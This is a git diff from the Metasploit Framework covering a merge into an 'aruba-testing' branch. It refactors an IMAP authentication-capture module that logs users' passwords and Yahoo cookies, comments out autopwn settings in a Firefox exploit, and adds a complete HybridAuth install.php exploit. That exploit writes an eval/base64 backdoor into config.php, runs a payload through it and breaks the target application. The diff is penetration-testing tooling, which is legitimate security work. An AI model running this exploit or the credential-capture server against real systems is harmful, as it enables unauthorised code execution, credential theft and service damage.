Merge branch 'master' into aruba-testing
commit
07ea8bedb5
|
@ -60,11 +60,6 @@ class Metasploit::Framework::Command::Base
|
||||||
# the configuration from the parsed options.
|
# the configuration from the parsed options.
|
||||||
parsed_options.configure(Rails.application)
|
parsed_options.configure(Rails.application)
|
||||||
|
|
||||||
# support disabling the database
|
|
||||||
unless parsed_options.options.database.disable
|
|
||||||
Metasploit::Framework::Require.optionally_active_record_railtie
|
|
||||||
end
|
|
||||||
|
|
||||||
Rails.application.require_environment!
|
Rails.application.require_environment!
|
||||||
|
|
||||||
parsed_options
|
parsed_options
|
||||||
|
|
|
@ -6,13 +6,11 @@
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::TcpServer
|
include Msf::Exploit::Remote::TcpServer
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Authentication Capture: IMAP',
|
'Name' => 'Authentication Capture: IMAP',
|
||||||
|
@ -56,11 +54,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def on_client_data(c)
|
def on_client_data(c)
|
||||||
data = c.get_once
|
data = c.get_once
|
||||||
return if not data
|
return unless data
|
||||||
num,cmd,arg = data.strip.split(/\s+/, 3)
|
num, cmd, arg = data.strip.split(/\s+/, 3)
|
||||||
arg ||= ""
|
arg ||= ""
|
||||||
|
|
||||||
if(cmd.upcase == "CAPABILITY")
|
if cmd.upcase == 'CAPABILITY'
|
||||||
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
|
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
|
||||||
"MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
|
"MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
|
||||||
"QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
|
"QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
|
||||||
|
@ -68,38 +66,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
c.put "#{num} OK CAPABILITY completed.\r\n"
|
c.put "#{num} OK CAPABILITY completed.\r\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI")
|
# Handle attempt to authenticate using Yahoo's magic cookie
|
||||||
|
# Used by iPhones and Zimbra
|
||||||
|
if cmd.upcase == 'AUTHENTICATE' && arg.upcase == 'XYMPKI'
|
||||||
c.put "+ \r\n"
|
c.put "+ \r\n"
|
||||||
cookie1 = c.get_once
|
cookie1 = c.get_once
|
||||||
c.put "+ \r\n"
|
c.put "+ \r\n"
|
||||||
cookie2 = c.get_once
|
cookie2 = c.get_once
|
||||||
report_auth_info(
|
register_creds(@state[c][:ip], cookie1, cookie2, 'imap-yahoo')
|
||||||
:host => @state[c][:ip],
|
|
||||||
:sname => 'imap-yahoo',
|
|
||||||
:port => datastore['SRVPORT'],
|
|
||||||
:source_type => "captured",
|
|
||||||
:user => cookie1,
|
|
||||||
:pass => cookie2
|
|
||||||
)
|
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
if(cmd.upcase == "LOGIN")
|
if cmd.upcase == 'LOGIN'
|
||||||
@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)
|
@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)
|
||||||
|
|
||||||
report_auth_info(
|
register_creds(@state[c][:ip], @state[c][:user], @state[c][:pass], 'imap')
|
||||||
:host => @state[c][:ip],
|
|
||||||
:port => datastore['SRVPORT'],
|
|
||||||
:sname => 'imap',
|
|
||||||
:user => @state[c][:user],
|
|
||||||
:pass => @state[c][:pass],
|
|
||||||
:active => true
|
|
||||||
)
|
|
||||||
print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
|
print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
if(cmd.upcase == "LOGOUT")
|
if cmd.upcase == 'LOGOUT'
|
||||||
c.put("* BYE IMAP4rev1 Server logging out\r\n")
|
c.put("* BYE IMAP4rev1 Server logging out\r\n")
|
||||||
c.put("#{num} OK LOGOUT completed\r\n")
|
c.put("#{num} OK LOGOUT completed\r\n")
|
||||||
return
|
return
|
||||||
|
@ -108,12 +94,43 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@state[c][:pass] = data.strip
|
@state[c][:pass] = data.strip
|
||||||
c.put "#{num} NO LOGIN FAILURE\r\n"
|
c.put "#{num} NO LOGIN FAILURE\r\n"
|
||||||
return
|
return
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_client_close(c)
|
def on_client_close(c)
|
||||||
@state.delete(c)
|
@state.delete(c)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def register_creds(client_ip, user, pass, service_name)
|
||||||
|
# Build service information
|
||||||
|
service_data = {
|
||||||
|
address: client_ip,
|
||||||
|
port: datastore['SRVPORT'],
|
||||||
|
service_name: service_name,
|
||||||
|
protocol: 'tcp',
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
# Build credential information
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :service,
|
||||||
|
module_fullname: self.fullname,
|
||||||
|
private_data: pass,
|
||||||
|
private_type: :password,
|
||||||
|
username: user,
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
||||||
|
login_data = {
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
create_credential_login(login_data)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -10,16 +10,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::Remote::BrowserAutopwn
|
# include Msf::Exploit::Remote::BrowserAutopwn
|
||||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||||
|
|
||||||
autopwn_info({
|
# autopwn_info({
|
||||||
:ua_name => HttpClients::FF,
|
# :ua_name => HttpClients::FF,
|
||||||
:ua_minver => "17.0",
|
# :ua_minver => "17.0",
|
||||||
:ua_maxver => "17.0.1",
|
# :ua_maxver => "17.0.1",
|
||||||
:javascript => true,
|
# :javascript => true,
|
||||||
:rank => NormalRanking
|
# :rank => NormalRanking
|
||||||
})
|
# })
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -0,0 +1,138 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = ManualRanking # application config.php is overwritten
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'HybridAuth install.php PHP Code Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a PHP code execution vulnerability in
|
||||||
|
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
|
||||||
|
is not removed after installation allowing unauthenticated users to
|
||||||
|
write PHP code to the application configuration file 'config.php'.
|
||||||
|
|
||||||
|
Note: This exploit will overwrite the application configuration file
|
||||||
|
rendering the application unusable.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Pichaya Morimoto', # Discovery and PoC
|
||||||
|
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['EDB', '34273'],
|
||||||
|
['OSVDB','109838']
|
||||||
|
],
|
||||||
|
'Arch' => ARCH_PHP,
|
||||||
|
'Platform' => 'php',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
# Tested:
|
||||||
|
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
|
||||||
|
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'Aug 4 2014',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# Check:
|
||||||
|
# * install.php exists
|
||||||
|
# * config.php is writable
|
||||||
|
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
|
||||||
|
#
|
||||||
|
def check
|
||||||
|
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
|
||||||
|
if !res
|
||||||
|
vprint_error "#{peer} - Connection failed"
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
elsif res.code == 404
|
||||||
|
vprint_error "#{peer} - Could not find install.php"
|
||||||
|
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
|
||||||
|
vprint_error "#{peer} - #{$1} is not writable"
|
||||||
|
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
|
||||||
|
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
|
||||||
|
vprint_status "#{peer} - Found version: #{version}"
|
||||||
|
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
else
|
||||||
|
vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Exploit
|
||||||
|
#
|
||||||
|
def exploit
|
||||||
|
# check vuln
|
||||||
|
if check != Exploit::CheckCode::Vulnerable
|
||||||
|
fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
|
||||||
|
end
|
||||||
|
|
||||||
|
# write backdoor
|
||||||
|
print_status "#{peer} - Writing backdoor to config.php"
|
||||||
|
payload_param = rand(1000)
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'install.php'),
|
||||||
|
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
|
||||||
|
)
|
||||||
|
if !res
|
||||||
|
fail_with Failure::Unknown, "#{peer} - Connection failed"
|
||||||
|
elsif res.body =~ /Installation completed/
|
||||||
|
print_good "#{peer} - Wrote backdoor successfully"
|
||||||
|
else
|
||||||
|
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
|
||||||
|
end
|
||||||
|
|
||||||
|
# execute payload
|
||||||
|
code = Rex::Text.encode_base64(payload.encoded)
|
||||||
|
print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'config.php'),
|
||||||
|
'data' => "#{payload_param}=#{code}"
|
||||||
|
}, 5)
|
||||||
|
if !res
|
||||||
|
print_warning "#{peer} - No response"
|
||||||
|
elsif res.code == 404
|
||||||
|
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
|
||||||
|
elsif res.code == 200 || res.code == 500
|
||||||
|
print_good "#{peer} - Sent payload successfully"
|
||||||
|
end
|
||||||
|
|
||||||
|
# remove backdoor
|
||||||
|
print_status "#{peer} - Removing backdoor from config.php"
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'install.php'),
|
||||||
|
'data' => 'OPENID_ADAPTER_STATUS='
|
||||||
|
)
|
||||||
|
if !res
|
||||||
|
print_error "#{peer} - Connection failed"
|
||||||
|
elsif res.body =~ /Installation completed/
|
||||||
|
print_good "#{peer} - Removed backdoor successfully"
|
||||||
|
else
|
||||||
|
print_warning "#{peer} - Could not remove payload from config.php"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -1,13 +1,9 @@
|
||||||
#!/usr/bin/env ruby
|
#!/usr/bin/env ruby
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
#
|
#
|
||||||
# $Id$
|
|
||||||
#
|
|
||||||
# This user interface provides users with a command console interface to the
|
# This user interface provides users with a command console interface to the
|
||||||
# framework.
|
# framework.
|
||||||
#
|
#
|
||||||
# $Revision$
|
|
||||||
#
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Standard Library
|
# Standard Library
|
||||||
|
@ -20,7 +16,7 @@ require 'pathname'
|
||||||
#
|
#
|
||||||
|
|
||||||
# @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
|
# @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
|
||||||
require Pathname.new(__FILE__).expand_path.parent.join('config', 'boot')
|
require Pathname.new(__FILE__).realpath.expand_path.parent.join('config', 'boot')
|
||||||
require 'metasploit/framework/command/console'
|
require 'metasploit/framework/command/console'
|
||||||
|
|
||||||
Metasploit::Framework::Command::Console.start
|
Metasploit::Framework::Command::Console.start
|
||||||
|
|
Loading…
Reference in New Issue